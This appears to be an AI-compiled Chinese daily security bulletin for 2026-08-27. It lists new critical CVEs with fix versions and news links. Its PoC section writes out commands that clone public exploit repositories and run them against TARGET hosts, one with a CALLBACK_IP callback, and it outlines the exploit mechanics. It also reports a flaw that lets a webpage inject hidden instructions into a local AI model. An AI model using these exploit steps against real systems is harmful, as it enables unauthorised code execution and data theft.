每日安全情报报告 · 2026-08-27

每日安全情报报告

由 AI 整理发布

覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章

风险等级:🔴 严重 | 🟠 高危 | 🟡 中危 | 🟢 低危

一、最新高危漏洞(近 24--48 小时)

🔴 严重(Critical · 在野利用优先)

CVE 漏洞类型 受影响组件 CVSS 状态 链接
CVE-2026-60004 代码注入(CWE-94)→ RCE(Git hook 注入) Gitea 1.17 ~ < 1.27.1 9.8 在野利用 · CISA KEV(8/25 新增) NVD 详情 · GitHub 安全公告
CVE-2026-21962 访问控制绕过(CWE-284)→ 未认证数据完全访问 Oracle HTTP Server / WebLogic Server Proxy Plug-in 12.2.1.4.0、14.1.1.0.0、14.1.2.0.0 10.0 在野利用 · CISA KEV(8/24 新增)· 联邦截止日 = 今日 8/27 NVD 详情 · CISA KEV 目录
CVE-2026-75604 路径遍历(CWE-22)→ 敏感信息泄露 → RCE Next.js(Windows 宿主)>= 13.4、>= 16.0(< 15.5.24 / 16.3.3) 9.0 PoC 公开(8/25 披露,多家厂商已复现) NVD 详情 · GitHub 安全公告

CVE-2026-60004(Gitea RCE)要点 :通过 POST /api/v1/repos/{owner}/{repo}/diffpatch 端点提交包含恶意 Git hook 的补丁,在 Git 2.32+ 的 bare 临时克隆上利用 add/add 冲突将可执行 hook 写入 $GIT_DIR/hooks/,以 Gitea 服务账户身份执行任意 shell 命令。默认开启开放注册(open registration)的实例可被匿名攻击者自注册后直接利用。已在真实目标上观测到挖矿类载荷,Nuclei 检测模板已发布。修复版本 1.27.1。

CVE-2026-21962(Oracle WebLogic)要点 :未认证攻击者经 HTTP 可越权创建/删除/修改关键数据并完全访问受影响组件可达数据。补丁自 2026 年 1 月起已发布,但 GreyNoise / CloudSEK 已观测到在野攻击(关联 SNOWLIGHT 下载器投放)。今日为联邦民事机构整改截止日,自建环境亦应视为紧急。

CVE-2026-75604(Next.js)要点 :Windows 文件系统上 FileSystemCache 未对反斜杠(\)转义,攻击者可借 ..%5C 穿越缓存路径读取私密 server-reference-manifest.json 窃取 Server Action 的 encryptionKey,进而伪造闭包绑定 Server Action 请求实现未认证 RCE。前置条件:Windows + Pages/App 双路由共存 + 未启用 Cache Components + 默认文件系统缓存。官方明确无 workaround,Windows 宿主须立即升级。360 / 奇安信 / 多个团队已复现。

🟠 高危(High)

CVE 漏洞类型 受影响组件 CVSS 链接
CVE-2026-75149 代码注入(CWE-94)→ MCP 命令执行 Marimo Notebook < 0.23.15 8.8 NVD 详情 · VulnCheck CNA
CVE-2026-77652 堆缓冲区溢出(CWE-122) GNOME Dia WPG 文件导入器(含 0.98+git20260221-1 及 master) 7.8 NVD 详情 · Red Hat CVE · Dia Issue #580
OpenSSL 批量修复(15 项 CVE) QUIC/DTLS/CMS/证书管理等多处远程 DoS、越界读写、空指针解引用 OpenSSL 4.0、3.6、3.5、3.4、3.0(及部分 1.1.1) 最高 7.5 RHSA-2026:25237 · NVD 列表(CVE-2026-14456 等)

OpenSSL 要点 :Red Hat 于 RHEL 10/9 发布重要安全更新(RHSA-2026:25237 / RHSA-2026:25239),修复 15 项漏洞,多数为可远程触发的拒绝服务(QUIC 服务端单包 double-free、DTLS 内存放大、CMS 越界写等)。官方已发布补丁版本 4.0.2 / 3.6.4 / 3.5.8 / 3.4.7 / 3.0.22,建议优先修补互联网暴露的 QUIC/DTLS/CMP 服务,并注意静态链接副本。

NVIDIA NemoClaw(无 CVE,AI 安全) :Oasis Security 披露 NemoClaw 缺陷------攻击者可借恶意网页在未认证 情况下接管本地 Ollama 实例并向模型注入隐藏指令(模型投毒)。macOS/Linux 已于 v0.0.35 修复,Windows/WSL 路径暂无修复(仅警告)。The Hacker News 报道

🟡 中危 / 持续在野(延续跟踪 · 不要松懈)

CVE 组件 状态 链接
CVE-2026-73570 Zimbra Collaboration(OS 命令注入,SNMP 通知触发未认证 RCE) 持续在野,Shadowserver 报告 ≥274 台公网实例已被攻陷 NVD 详情
CVE-2026-55040 / CVE-2026-63520 Microsoft SharePoint(链式未认证 RCE) 在野利用 · KEV,8500+ 公网服务器 NVD: 55040 · NVD: 63520
CVE-2026-61979 / CVE-2026-15981 WordPress miniOrange SAML SSO 活跃扫描,可伪造断言接管管理员 NVD: 61979
CVE-2026-18963 Keycloak(reset-credentials 绕过→未认证账户接管) PoC 公开,已在野 NVD 详情
CVE-2026-64849 MLflow(SSRF) CISA KEV(8/19 新增),截止 9/2 NVD 详情

二、最新漏洞 PoC

1. Gitea CVE-2026-60004(自动化利用,公开 PoC)

  • 原理 :向 diffpatch 端点两次提交含恶意 hooks/post-receive 的补丁,利用 Git 三路回退将可执行 hook 写入 bare 克隆的 hook 目录,命令以 Gitea 服务账户执行;通过新建分支回传命令输出,无需目标出网。
  • 依赖:Python 3.7+(仅用标准库,无需 pip 安装)。
  • 使用步骤
bash 复制代码
git clone https://github.com/imbas007/CVE-2026-60004-POC.git
cd CVE-2026-60004-POC
# 全自动化:注册 → 建仓 → 利用 → 取回结果
python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode full-auto --cmd id
# 仅非侵入式检测
python3 cve-2026-60004-poc.py --url http://TARGET:3000 --mode check
  • 其他公开仓库0xBlackash/CVE-2026-60004
  • 修复 :升级至 Gitea 1.27.1+,并关闭公开注册(DISABLE_REGISTRATION=true)、限制 diffpatch 端点访问。

2. Next.js CVE-2026-75604(未认证 RCE,公开 PoC)

  • 原理 :Windows 文件系统上 FileSystemCache 路径拼接未转义反斜杠,借 ..%5C 穿越读取 server-reference-manifest.json 获取 Server Action encryptionKey,伪造闭包绑定 Server Action 实现命令执行。
  • 依赖 :Python 3.9+;cryptographyrequests
  • 使用步骤
bash 复制代码
git clone https://github.com/rafabd1/CVE-2026-75604-poc.git
cd CVE-2026-75604-poc
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
  --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
# 指定命令:--command "whoami"
  • Sploitus 镜像HackSpeak/CVE-2026-75604
  • 修复 :升级至 Next.js 15.5.2416.3.3+ ,重新 next buildnext start;Windows 宿主在升级前可临时迁移至 Linux 文件系统规避。

3. 其他可用检测 / 复现资源

  • Gitea 资产与批量检测:Nuclei 模板「Gitea <= 1.27.0 - Pre-Auth RCE」已发布(critical 级)。
  • Next.js 复现镜像 :360 漏洞研究院、奇安信 CERT 均已公开复现截图与本地靶场说明(奇安信通告)。
  • Marimo CVE-2026-75149:升级至 0.23.15;避免在不可信笔记本上以 edit 模式打开。

三、网络安全最新文章

  1. Gitea 严重 RCE 已在野利用,CISA 列入 KEV --- The Hacker News 报道 CVE-2026-60004 的武器化与真实挖矿载荷。阅读原文
  2. Oracle WebLogic 漏洞纳入 CISA KEV,联邦整改今日截止 --- CyberRecaps 8/26 简报,含 SNOWLIGHT 下载器关联。阅读原文
  3. OpenSSL 修复 9 项可致远程拒绝服务的漏洞(QUIC/DTLS/CMS) --- AboutDFIR 8/26 资讯汇总。阅读原文
  4. 恶意网页可污染本地 AI 模型:NVIDIA NemoClaw 缺陷分析 --- Oasis Security 经 THN 披露,本地 Ollama 实例可被未认证接管。阅读原文
  5. Marimo Notebook 缺陷可在单元格执行前运行 MCP 命令 --- VulnCheck CNA 记录 CVE-2026-75149(CVSS 8.8)。阅读原文
  6. 超 270 台 Zimbra 服务器在持续攻击中被攻陷 --- DanSec 8/26 每日安全简报(含挪威政府 DDoS、miniOrange SAML 在野扫描等)。阅读原文
  7. Operation QUICSILVER:以 QUICAgent 后门瞄准缅甸政府与 IT --- The Hacker News 报道疑似中国背景 APT 的钓鱼诱饵攻击链。阅读原文
  8. WhatsApp 引入多 Passkey 与更强双因素验证,抵御钓鱼 --- The Hacker News 8/25 认证安全报道。阅读原文

部分内容由 AI 辅助生成

相关推荐
Trinitytec1 小时前
源码不出网,开源治理工具SCA应该如何部署?
网络安全·开源·源代码管理
一条泥憨鱼2 小时前
【从0开始学习计算机网络】| WebSocket-握手、全双工和心跳
websocket·计算机网络·网络安全·https·dns
Yan_chen6663 小时前
Vulhub 靶场:Tomcat8 弱口令与 WAR 包上传漏洞复现
java·网络安全·靶场·tomcat·文件上传漏洞
小猪妈咪爱学法11 小时前
欧盟最新发布《AI数字综合法案(Digital Omnibus‑on‑AI,AI综合修订法案)
人工智能·网络安全
安全小王子12 小时前
nssctf_easyapp
网络安全·逆向·ctf·nssctf
菩提小狗14 小时前
每日安全情报报告 · 2026-08-26
网络安全·漏洞·cve·安全情报·每日安全
数据知道18 小时前
漏洞挖掘方法论:从 Fuzz 到 0day 的思维框架
网络·安全·web安全·网络安全
数据知道1 天前
白盒审计入门:Source Code Review 检查清单
网络·安全·网络安全·代码复审
菜根Sec1 天前
信息安全工程师该怎么准备考试
web安全·网络安全·信息安全·信息安全工程师